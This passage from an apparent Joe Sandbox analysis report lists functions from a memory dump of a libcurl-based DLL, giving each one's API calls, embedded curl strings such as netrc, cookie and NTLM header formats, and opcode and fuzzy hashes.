                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_mvsnprintf
                                                                                                                                  • String ID: %s: %s, %02d %s %4d %02d:%02d:%02d GMT$If-Modified-Since$If-Unmodified-Since$Invalid TIMEVALUE$Last-Modified
                                                                                                                                  • API String ID: 3418963191-4153637960
                                                                                                                                  • Opcode ID: 3355b1234afa649fb0f7d7ec5efacead545ef475a81cdcfe41abe60542f74cb4
                                                                                                                                  • Instruction ID: 74776673512f49fd045c1bdc8fbc013f4df0fe833d929bf1bdf8ae0af055c8f8
                                                                                                                                  • Opcode Fuzzy Hash: 3355b1234afa649fb0f7d7ec5efacead545ef475a81cdcfe41abe60542f74cb4
                                                                                                                                  • Instruction Fuzzy Hash: 36312D32A4010DABCF10DFB8DD51AADB7B8FF49754F100069E90997251DB3AD915DB90
                                                                                                                                  Function 6B8FA120 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 92COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • curl_getenv.LIBCURL(HOME,000003DC,00000000,000003D8,?,6B8E42F0,?,00000000,00000000,00000000,?,?), ref: 6B8FA136
                                                                                                                                    • Part of subcall function 6B8E6310: GetEnvironmentVariableA.KERNEL32(?,00000000,00000001), ref: 6B8E633A
                                                                                                                                  • curl_maprintf.LIBCURL(%s%s.netrc,00000000,6B93F918,00000000), ref: 6B8FA157
                                                                                                                                  • curl_maprintf.LIBCURL(%s%s_netrc,00000000,6B93F918), ref: 6B8FA196
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_maprintf$EnvironmentVariablecurl_getenv
                                                                                                                                  • String ID: %s%s.netrc$%s%s_netrc$HOME
                                                                                                                                  • API String ID: 2809420521-3384076093
                                                                                                                                  • Opcode ID: 439baf2fe8d0492899c1aab9d54172a95149d82626ae4d1116ebaf5c06abbecf
                                                                                                                                  • Instruction ID: 708f44e63ffcb642fbe48d95d6cab0752bf96b952fcb87a91c5ffc9c2f0adc99
                                                                                                                                  • Opcode Fuzzy Hash: 439baf2fe8d0492899c1aab9d54172a95149d82626ae4d1116ebaf5c06abbecf
                                                                                                                                  • Instruction Fuzzy Hash: 02216237544129BB8F011FA8AD05ACB3B79EF862B9B044971FD1883121D73BC57297B1
                                                                                                                                  Function 6B92F88C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                  • API String ID: 0-537541572
                                                                                                                                  • Opcode ID: 2bf8a3e2e317776a4dc1fcd6313891f864fecb247dae3711d4d289da9f2935f9
                                                                                                                                  • Instruction ID: 190c0318980caaa46d8bcf8dd1a1ebf9c5a4918d026d3706bd86001d5088bdf1
                                                                                                                                  • Opcode Fuzzy Hash: 2bf8a3e2e317776a4dc1fcd6313891f864fecb247dae3711d4d289da9f2935f9
                                                                                                                                  • Instruction Fuzzy Hash: D421E736D69621BBDB215B648C92B0A376C9F027BCF110170ED55E728AD738ED01C6E1
                                                                                                                                  Function 6B935EEE Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6B935EB6: _free.LIBCMT ref: 6B935EDB
                                                                                                                                  • _free.LIBCMT ref: 6B935F3C
                                                                                                                                    • Part of subcall function 6B92F7EA: RtlFreeHeap.NTDLL(00000000,00000000,?,6B935EE0,6B9538A0,00000000,6B9538A0,00000000,?,6B935F07,6B9538A0,00000007,6B9538A0,?,6B93532A,6B9538A0), ref: 6B92F800
                                                                                                                                    • Part of subcall function 6B92F7EA: GetLastError.KERNEL32(6B9538A0,?,6B935EE0,6B9538A0,00000000,6B9538A0,00000000,?,6B935F07,6B9538A0,00000007,6B9538A0,?,6B93532A,6B9538A0,6B9538A0), ref: 6B92F812
                                                                                                                                  • _free.LIBCMT ref: 6B935F47
                                                                                                                                  • _free.LIBCMT ref: 6B935F52
                                                                                                                                  • _free.LIBCMT ref: 6B935FA6
                                                                                                                                  • _free.LIBCMT ref: 6B935FB1
                                                                                                                                  • _free.LIBCMT ref: 6B935FBC
                                                                                                                                  • _free.LIBCMT ref: 6B935FC7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: a8bb62acc84794d0cec4dfd56d9c4c222a678d525f8e7b70c7cbbc07179f796b
                                                                                                                                  • Instruction ID: b25ea3cd88e12d8de297041e3b9f6795d59c86967c9e7112833a40892a9354c0
                                                                                                                                  • Opcode Fuzzy Hash: a8bb62acc84794d0cec4dfd56d9c4c222a678d525f8e7b70c7cbbc07179f796b
                                                                                                                                  • Instruction Fuzzy Hash: 7C112971D45B14FAEA30EBB0CC46FCB7BDDBF2870DF400915A29AA6060DB79E5048690
                                                                                                                                  Function 6B8D6AC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 60COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • curl_maprintf.LIBCURL(%s%s%s%s%s%s%I64d%s%s,#HttpOnly_,6B93B98E,unknown,6B93B988,6B93B868,6B93B988,100C15FF,5D8B6B95,74DB8504,6B93B98E,00000000,00000000,00000000), ref: 6B8D6B55
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_maprintf
                                                                                                                                  • String ID: #HttpOnly_$%s%s%s%s%s%s%I64d%s%s$FALSE$TRUE$unknown
                                                                                                                                  • API String ID: 3307269620-3622669638
                                                                                                                                  • Opcode ID: fa614c5637c284cdecbd0225f511c1297e7a6d4878214d533360672b7224b16d
                                                                                                                                  • Instruction ID: 780345763ad898ac237884a693229197679a612c7c68b69be682ab031de3d013
                                                                                                                                  • Opcode Fuzzy Hash: fa614c5637c284cdecbd0225f511c1297e7a6d4878214d533360672b7224b16d
                                                                                                                                  • Instruction Fuzzy Hash: 14118264700659AFEB148A65DC95B52FBF9AF49394F0582D9EC08DB203D325DD80C7A1
                                                                                                                                  Function 6B92E4BC Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetConsoleCP.KERNEL32(6B9292EA,00000000,?), ref: 6B92E504
                                                                                                                                  • __fassign.LIBCMT ref: 6B92E6E3
                                                                                                                                  • __fassign.LIBCMT ref: 6B92E700
                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6B92E748
                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6B92E788
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6B92E834
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4031098158-0
                                                                                                                                  • Opcode ID: 4265f063cbd7fe2a788f12f67cdbdbaa8c7601ff17c1a0ab179b8c2ad8854b2a
                                                                                                                                  • Instruction ID: c1863fe4f3d5ce49cf7c67ac4d93ec71dbf82f5314af6e79ab4120ba7068d214
                                                                                                                                  • Opcode Fuzzy Hash: 4265f063cbd7fe2a788f12f67cdbdbaa8c7601ff17c1a0ab179b8c2ad8854b2a
                                                                                                                                  • Instruction Fuzzy Hash: 44D1BA75D256589FCF15CFA8C8C09EDBBB9BF09304F28016AE855BB245E334E946CB50
                                                                                                                                  Function 6B8FD1F0 Relevance: 9.3, APIs: 6, Instructions: 255COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD266
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD27A
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD2CC
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD2F9
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD362
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD4C1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 885266447-0
                                                                                                                                  • Opcode ID: 193fb2b233c6687e6d7748bdc0fcc155be9083024f1308d3ad034d1fb19cc984
                                                                                                                                  • Instruction ID: 0811846a7ff67bf1d12e3cd0a54fdfa6cb68c869a86bbbbba23e8e2c342ca959
                                                                                                                                  • Opcode Fuzzy Hash: 193fb2b233c6687e6d7748bdc0fcc155be9083024f1308d3ad034d1fb19cc984
                                                                                                                                  • Instruction Fuzzy Hash: A2A1F374E442059BDB10CF78C881BAA7BB8EF95358F1486B9ED1C9B345EB34A941C7A0
                                                                                                                                  Function 6B914F30 Relevance: 9.1, APIs: 6, Instructions: 104COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000004,?,?), ref: 6B91500B
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000,?,00000001,00000004,?,?), ref: 6B915012
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000,?,00000020,00000005,?,00000001,00000004,?,?), ref: 6B91501F
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000,?,00000010,00000005,?,00000020,00000005,?,00000001,00000004,?,?), ref: 6B915026
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000,?,00000008,00000001,?,00000010,00000005,?,00000020,00000005,?,00000001,00000004,?,?), ref: 6B915032
                                                                                                                                  • VerifyVersionInfoA.KERNEL32(0000009C,00000033,00000000), ref: 6B91503F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ConditionMask$InfoVerifyVersion
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2793162063-0
                                                                                                                                  • Opcode ID: 5ab8ea67c4a4f8b582ae2405d261572ed707b292bd7a325f2860dc30ac8f0ed2
                                                                                                                                  • Instruction ID: 8e70ea689f4452d1ce358156af12b5272f0db257eebfdbb5a60e8ef365b52587
                                                                                                                                  • Opcode Fuzzy Hash: 5ab8ea67c4a4f8b582ae2405d261572ed707b292bd7a325f2860dc30ac8f0ed2
                                                                                                                                  • Instruction Fuzzy Hash: 7C316170B4835CAEEF20CA688C49F9B7BB8AB47704F1100D9B54D67381C6749E849F62
                                                                                                                                  Function 6B916410 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 343COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • htonl.WS2_32(?), ref: 6B9165CA
                                                                                                                                  • htonl.WS2_32(?), ref: 6B916626
                                                                                                                                    • Part of subcall function 6B9006B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,6B8F6C24), ref: 6B9006EF
                                                                                                                                    • Part of subcall function 6B9006B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B90072F
                                                                                                                                  Strings
                                                                                                                                  • GSSAPI handshake failure (invalid security data), xrefs: 6B916583
                                                                                                                                  • GSSAPI handshake failure (empty security message), xrefs: 6B916561, 6B91681F
                                                                                                                                  • GSSAPI handshake failure (invalid security layer), xrefs: 6B9165BA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: htonl$curl_msnprintfcurl_mvsnprintf
                                                                                                                                  • String ID: GSSAPI handshake failure (empty security message)$GSSAPI handshake failure (invalid security data)$GSSAPI handshake failure (invalid security layer)
                                                                                                                                  • API String ID: 3222853418-242323837
                                                                                                                                  • Opcode ID: 294a2cdd1afef918a1a4d19a3ffe38aa4665b158d9a4289c50b14cafbfec87db
                                                                                                                                  • Instruction ID: bb8c206ab6d80a2c74fbb3f52cf785744c43331b719e355f2d5e343ebadb6bfc
                                                                                                                                  • Opcode Fuzzy Hash: 294a2cdd1afef918a1a4d19a3ffe38aa4665b158d9a4289c50b14cafbfec87db
                                                                                                                                  • Instruction Fuzzy Hash: A8D15BB6D04228EFCF10DFA8D845B9DBBB8FF0A315F1041A9E809A7251DB39D915DB60
                                                                                                                                  Function 6B8F88F0 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 338COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  • Operation timed out after %I64d milliseconds with %I64d out of %I64d bytes received, xrefs: 6B8F8A9F
                                                                                                                                  • Connection timed out after %I64d milliseconds, xrefs: 6B8F8A47
                                                                                                                                  • Operation timed out after %I64d milliseconds with %I64d bytes received, xrefs: 6B8F8AD1
                                                                                                                                  • Resolving timed out after %I64d milliseconds, xrefs: 6B8F8A12
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_mvsnprintf
                                                                                                                                  • String ID: Connection timed out after %I64d milliseconds$Operation timed out after %I64d milliseconds with %I64d bytes received$Operation timed out after %I64d milliseconds with %I64d out of %I64d bytes received$Resolving timed out after %I64d milliseconds
                                                                                                                                  • API String ID: 3418963191-3898356422
                                                                                                                                  • Opcode ID: b73d54a893f2023418bff342c8cfd9930ef54d950dd56330251015528e2fe850
                                                                                                                                  • Instruction ID: c4a989cc5178861f0827c81aac35c08c24930bce6cb07f4fb80f8ce30c43f13b
                                                                                                                                  • Opcode Fuzzy Hash: b73d54a893f2023418bff342c8cfd9930ef54d950dd56330251015528e2fe850
                                                                                                                                  • Instruction Fuzzy Hash: 4AC13970A006049FE7109F3DCC42FAB77E8EF45358F00499DE8599B252D739E986C7A2
                                                                                                                                  Function 6B920584 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(00000001,?,6B920324,6B91E939,6B91E49A,?,6B91E6B7,?,00000001,?,?,00000001,?,6B94E298,0000000C,6B91E7AB), ref: 6B920592
                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6B9205A0
                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6B9205B9
                                                                                                                                  • SetLastError.KERNEL32(00000000,6B91E6B7,?,00000001,?,?,00000001,?,6B94E298,0000000C,6B91E7AB,?,00000001,?), ref: 6B92060B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                  • Opcode ID: be4e74862ce736eb44082f3ba373571857ed21968a3f797a4728826249446e2b
                                                                                                                                  • Instruction ID: e75f3b85cadc5c27ae5e8e2ee120ebd8a2341ad5e1ea771fe5259411c66cedc2
                                                                                                                                  • Opcode Fuzzy Hash: be4e74862ce736eb44082f3ba373571857ed21968a3f797a4728826249446e2b
                                                                                                                                  • Instruction Fuzzy Hash: 8F012833D6D2116FD71526756CA595B3BA8EB26BBCB2003B9F510540D8EF3AC8005684
                                                                                                                                  Function 6B8D95D0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 253COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ../$/..$/../$/./
                                                                                                                                  • API String ID: 0-456519384
                                                                                                                                  • Opcode ID: 79b10fdf95fccf1a41efd1cc37e2a4d873453d4f0c733adaf4e3e99863c8ed3a
                                                                                                                                  • Instruction ID: 421b4036b0074d7fa564b4587091038331076e70abe10538e868866d17773701
                                                                                                                                  • Opcode Fuzzy Hash: 79b10fdf95fccf1a41efd1cc37e2a4d873453d4f0c733adaf4e3e99863c8ed3a
                                                                                                                                  • Instruction Fuzzy Hash: A8710D66E4C195DAD7110E38A8B57A27FB69F53358F9809E7C9898B203F72FC409C361
                                                                                                                                  Function 6B8D62C0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 199COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • curl_strnequal.LIBCURL(Set-Cookie:,00000000,0000000B,?,?,?,?,?,?,?), ref: 6B8D6449
                                                                                                                                  • curl_slist_free_all.LIBCURL(?), ref: 6B8D64F5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_slist_free_allcurl_strnequal
                                                                                                                                  • String ID: Set-Cookie:$ignoring failed cookie_init for %s$none
                                                                                                                                  • API String ID: 2653667558-4095489131
                                                                                                                                  • Opcode ID: e9d8370197b4576145c030739bb117e610213429682889d488d9707b4d7fc510
                                                                                                                                  • Instruction ID: 8c7f7df9af04f87317220dbbc69e84baee29eb588548e0a4e2f2fc1e587394c5
                                                                                                                                  • Opcode Fuzzy Hash: e9d8370197b4576145c030739bb117e610213429682889d488d9707b4d7fc510
                                                                                                                                  • Instruction Fuzzy Hash: 886156B5D04358ABEB018F748C42BAA7B755F1670CF0848EAED486B343EB7AD505C7A1
                                                                                                                                  Function 6B8EE0E0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 179COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • curl_maprintf.LIBCURL(%sAuthorization: NTLM %s,Proxy-,00000000,?,?,?,?,?,?,00000000,?), ref: 6B8EE253
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_maprintf
                                                                                                                                  • String ID: %sAuthorization: NTLM %s$HTTP$Proxy-
                                                                                                                                  • API String ID: 3307269620-3667642693
                                                                                                                                  • Opcode ID: 6fdc2434185ac1002988a8f5d1cbb33ff30dec61ca04e154e3755b986ef15f52
                                                                                                                                  • Instruction ID: dc67b02d4a7bb9a939938198ec7fc8d06fb28bb0c8040d451d3862d127bf5738
                                                                                                                                  • Opcode Fuzzy Hash: 6fdc2434185ac1002988a8f5d1cbb33ff30dec61ca04e154e3755b986ef15f52
                                                                                                                                  • Instruction Fuzzy Hash: D8713C75A00619EFDB51CFA8C841BAEBBF5FB4A315F0045AAE804E7210D375AE50DFA0
                                                                                                                                  Function 6B8E43E0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 170COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8E44EA
                                                                                                                                  Strings
                                                                                                                                  • Invalid IPv6 address format, xrefs: 6B8E44D7
